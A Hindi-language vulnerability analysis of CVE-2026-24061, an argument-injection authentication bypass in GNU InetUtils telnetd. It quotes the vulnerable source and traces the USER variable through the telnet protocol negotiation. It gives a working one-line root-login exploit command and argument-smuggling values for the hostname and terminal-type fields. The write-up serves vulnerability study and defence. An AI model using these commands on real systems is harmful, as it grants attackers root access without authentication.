
गहन तकनीकी विश्लेषण और स्कैनर CVE-2026-24061 के लिए, जो GNU InetUtils telnetd में एक गंभीर प्रमाणीकरण बाईपास है, जिसमें एक्सप्लॉइट चेन, PoC और पैच विवरण शामिल हैं।
CVE-2026-24061 GNU InetUtils telnetd में एक गंभीर (CVSS 9.8) रिमोट प्रमाणीकरण बाईपास भेद्यता है जो बिना प्रमाणित हमलावरों को तुरंत रूट एक्सेस प्राप्त करने की अनुमति देती है। यह भेद्यता USER पर्यावरण चर के अनुचित सैनिटाइज़ेशन के कारण उत्पन्न होती है, जिसे सीधे /usr/bin/login को कमांड-लाइन तर्क के रूप में पारित किया जाता है। USER=-f root सेट करके, एक हमलावर login के -f फ्लैग को ट्रिगर करता है, जो प्रमाणीकरण को पूरी तरह से बाईपास कर देता है।
प्रभावित संस्करण: GNU InetUtils 1.9.3 से 2.7 भेद्यता प्रकार: CWE-88 (तर्क इंजेक्शन) खोज की तिथि: 20 जनवरी, 2026 खोजकर्ता: Kyu Neushwaistein (उर्फ Carlos Cortes Alvarez)
telnetd/telnetd.c, पंक्तियाँ ~49-63)भेद्यता एक कमांड टेम्पलेट स्ट्रिंग से शुरू होती है जो परिभाषित करती है कि telnetd /usr/bin/login को कैसे इनवोक करता है:
/* Template command line for invoking login program. */
char *login_invocation =
#ifdef SOLARIS10
PATH_LOGIN " -p -h %h %?T{-t %T} -d %L %?u{-u %u}{%U}"
#elif defined SOLARIS
PATH_LOGIN " -h %h %?T{%T} %?u{-- %u}{%U}"
#else /* !SOLARIS */
PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"
#endif
;
मुख्य अवलोकन: गैर-Solaris सिस्टम पर, टेम्पलेट उपयोग करता है:
%?u{-f %u}{%U} - यह एक सशर्त अभिव्यक्ति है जिसका अर्थ है:
user_name सेट है (%u), तो -f %u उपयोग करें (प्रमाणित ऑटोलॉगिन)%U उपयोग करें (USER पर्यावरण चर फ़ॉलबैक के रूप में)महत्वपूर्ण समस्या: %U कच्चे, बिना सैनिटाइज़ किए USER पर्यावरण चर में विस्तारित होता है।
telnetd/utility.c, _var_short_name())टेम्पलेट स्ट्रिंग को expand_line() द्वारा संसाधित किया जाता है, जो प्लेसहोल्डर्स को विस्तारित करने के लिए _var_short_name() को कॉल करता है। यहाँ भेद्य कोड है:
/* Expand a variable referenced by its short one-symbol name. */
char *
_var_short_name (struct line_expander *exp)
{
char *q;
char timebuf[64];
time_t t;
switch (*exp->cp++)
{
case 'a':
#ifdef AUTHENTICATION
if (auth_level >= 0 && autologin == AUTH_VALID)
return xstrdup ("ok");
#endif
return NULL;
case 'd':
time (&t);
strftime (timebuf, sizeof (timebuf),
"%l:%M%p on %A, %d %B %Y", localtime (&t));
return xstrdup (timebuf);
case 'h':
return xstrdup (remote_hostname); // POTENTIALLY VULNERABLE
case 'l':
return xstrdup (local_hostname);
case 'L':
return xstrdup (line);
case 't':
q = strchr (line + 1, '/');
if (q)
q++;
else
q = line;
return xstrdup (q);
case 'T':
return terminaltype ? xstrdup (terminaltype) : NULL; // POTENTIALLY VULNERABLE
case 'u':
return user_name ? xstrdup (user_name) : NULL;
case 'U':
return getenv ("USER") ? xstrdup (getenv ("USER")) : xstrdup (""); // VULNERABLE!
default:
exp->state = EXP_STATE_ERROR;
return NULL;
}
}
महत्वपूर्ण बग (केस 'U'): USER पर्यावरण चर को getenv() के माध्यम से प्राप्त किया जाता है और बिना किसी सैनिटाइज़ेशन के पारित किया जाता है। जब कोई हमलावर USER=-f root सेट करता है, तो यह लॉगिन कमांड लाइन का हिस्सा बन जाता है।
telnetd/pty.c, start_login())विस्तारित लॉगिन इनवोकेशन स्ट्रिंग को start_login() में निष्पादित किया जाता है:
/* Construct login command from template */
argcv_string (argcv_length (argv, NULL), argv, &login_cmd);
/* Execute login - this runs: /usr/bin/login -p -h <hostname> -f root */
execv (argv[0], argv);
हमलावर कनेक्ट करता है telnetd (पोर्ट 23) से
टेलनेट विकल्प वार्ता होती है:
IAC DO NEW_ENVIRONIAC WILL NEW_ENVIRONIAC SB NEW_ENVIRON SEND (पर्यावरण का अनुरोध)IAC SB NEW_ENVIRON IS VAR "USER" VALUE "-f root" IAC SEसर्वर USER चर को संसाधित करता है:
getenv("USER") लौटाता है -f root%U विस्तारित होता है -f root में/usr/bin/login -p -h <hostname> -f rootलॉगिन -f root की व्याख्या करता है:
-f फ्लैग का अर्थ है "प्रमाणीकरण छोड़ें, उपयोगकर्ता पूर्व-प्रमाणित है"root वह उपयोगकर्ता नाम है जिसके रूप में लॉगिन करना है# On attacker machine:
USER='-f root' telnet -a <target_ip>
-a फ्लैग स्वचालित लॉगिन मोड को सक्षम करता है, जो USER पर्यावरण चर को सर्वर को भेजता है।
सुरक्षा सलाह स्पष्ट रूप से नोट करती है: "इस प्रकार अन्य चरों के लिए समान भेद्यताओं की संभावना है।" आइए _var_short_name() में प्रत्येक चर का विश्लेषण करें:
| Var | नाम | स्रोत | उपयोगकर्ता नियंत्रणीय? | सैनिटाइज़ किया गया? | हमला सतह |
|---|---|---|---|---|---|
%U | USER env var | getenv("USER") | हाँ (NEW_ENVIRON के माध्यम से) | नहीं | महत्वपूर्ण - CVE-2026-24061 |
%h | remote_hostname | DNS/PTR लुकअप | आंशिक (PTR रिकॉर्ड) | नहीं | उच्च |
%T | terminaltype | TERMINAL-TYPE विकल्प | हाँ | नहीं | मध्यम |
%u | user_name | प्रोटोकॉल वार्ता | हाँ | नहीं | मध्यम (प्रमाणीकरण की आवश्यकता) |
%l | local_hostname | सिस्टम कॉन्फ़िगरेशन | नहीं | N/A | निम्न |
%L | line (TTY) | सिस्टम आवंटित | नहीं | N/A | निम्न |
%t | tty shortname | सिस्टम आवंटित | नहीं | N/A | निम्न |
%d | दिनांक/समय | सिस्टम घड़ी | नहीं | N/A | कोई नहीं |
%a | प्रमाणीकरण स्थिति | आंतरिक स्थिति | नहीं | N/A | कोई नहीं |
%h - रिमोट होस्टनाम (उच्च जोखिम)स्रोत: telnetd_setup() में telnetd.c से getnameinfo() या gethostbyaddr() के माध्यम से भरा जाता है।
समस्या: यदि कोई हमलावर अपने PTR (रिवर्स DNS) रिकॉर्ड को नियंत्रित करता है, तो वे संभावित रूप से इंजेक्ट कर सकते हैं:
foo -f root
अपने होस्टनाम के रूप में, जो -h तर्क का हिस्सा बन जाएगा:
/usr/bin/login -p -h "foo -f root" ...
शोषण कठिनाई:
वास्तविक-विश्व परिदृश्य: अपने IP के PTR रिकॉर्ड के नियंत्रण वाला हमलावर (VPS प्रदाताओं के लिए सामान्य) अपने रिवर्स DNS को दुर्भावनापूर्ण मान पर सेट कर सकता है।
%T - टर्मिनल प्रकार (मध्यम जोखिम)स्रोत: टेलनेट TERMINAL-TYPE उप-वार्ता के माध्यम से प्राप्त, terminaltype चर में संग्रहीत।
समस्या: टर्मिनल प्रकार स्ट्रिंग हमलावर-नियंत्रित और बिना सैनिटाइज़ है:
case 'T':
return terminaltype ? xstrdup (terminaltype) : NULL;
टेम्पलेट्स में उपयोग:
%?T{-t %T} - -t फ्लैग के साथ उपयोग किया जाता है%?T{%T} - सीधे डाला गयासंभावित हमला:
TERMINAL-TYPE: xterm -f root
हालाँकि, शोषण निर्भर करता है:
%T का उपयोग करता है (वर्तमान में केवल Solaris)-t तर्क को कैसे संभालता है%u - प्रमाणित उपयोगकर्ता नाम (मध्यम जोखिम)स्रोत: प्रमाणीकरण वार्ता के दौरान सेट किया जाता है।
समस्या: -f %u पैटर्न में उपयोग किया जाता है:
PATH_LOGIN " -p -h %h %?u{-f %u}{%U}"
यदि कोई हमलावर user_name में शेल मेटाकैरेक्टर या अतिरिक्त तर्क शामिल करने के लिए हेरफेर कर सकता है, तो वे उन्नयन प्राप्त कर सकते हैं। हालाँकि, यह चर आमतौर पर किसी प्रकार के प्रमाणीकरण सत्यापन के बाद ही सेट किया जाता है।
%l, %L, %t: ये सिस्टम-नियंत्रित मानों (स्थानीय होस्टनाम, TTY डिवाइस नाम) से प्राप्त होते हैं जिन्हें हमलावर दूरस्थ रूप से प्रभावित नहीं कर सकते।
%d: सिस्टम घड़ी से उत्पन्न - कोई इंजेक्शन वेक्टर नहीं।
%a: आंतरिक प्रमाणीकरण स्थिति चर - शाब्दिक "ok" या NULL लौटाता है।